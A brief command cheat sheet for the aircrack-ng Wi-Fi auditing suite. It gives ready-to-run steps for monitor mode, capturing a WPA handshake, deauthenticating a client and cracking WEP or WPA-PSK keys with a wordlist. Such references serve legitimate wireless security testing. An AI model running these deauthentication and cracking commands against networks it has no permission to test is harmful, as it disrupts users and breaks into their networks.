https://github.com/aircrack-ng/aircrack-ng

Monitor Mode

airmon-ng check kill
Kill processes that interfere with monitor mode.

airmon-ng start wlan0
Start monitor mode on wlan0 interface.

Capture

airodump-ng wlan0mon
List the APs in range.

airodump-ng --channel 6 --bssid AP:MAC -w capture wlan0mon
Capture traffic from one AP. Wait for the WPA handshake to appear in the top right of the airodump-ng display. A deauth attack can speed up the process.

Deauth Attack

aireplay-ng -0 1 -a AP:MAC -c CLIENT:MAC wlan0mon
Deauth attack (briefly kicks the client off the AP).

-0 1
Deauth, one time.

-c
Client to deauthenticate.

Crack WEP, WPA-PSK

aircrack-ng -a WEP myCapture.cap
aircrack-ng -w wordlist.txt -b AP:MAC myCaptureFromAirodump

-a WEP
Attack mode: WEP (needs > 5000 IVs) or WPA-PSK.

-e mySSID
Specifies SSID.

-n 64
Size of the WEP key in bits (64, 128, 152, 256, 512).